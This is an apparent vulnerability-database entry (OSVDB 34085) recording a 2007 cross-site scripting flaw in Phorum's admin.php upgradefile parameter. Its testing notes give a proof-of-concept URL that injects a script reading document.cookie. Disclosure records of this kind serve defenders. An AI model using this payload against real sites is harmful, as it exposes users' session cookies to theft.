Phorum admin.php upgradefile Variable XSS

2007-02-26T03:13:14
ID OSVDB:34085
Type osvdb
Reporter OSVDB
Modified 2007-02-26T03:13:14

Description

Manual Testing Notes

http://[target]/[path]/admin.php?upgradefile="><script>alert(document.cookie);</script>

References:

Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-02/0496.html Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-02/0501.html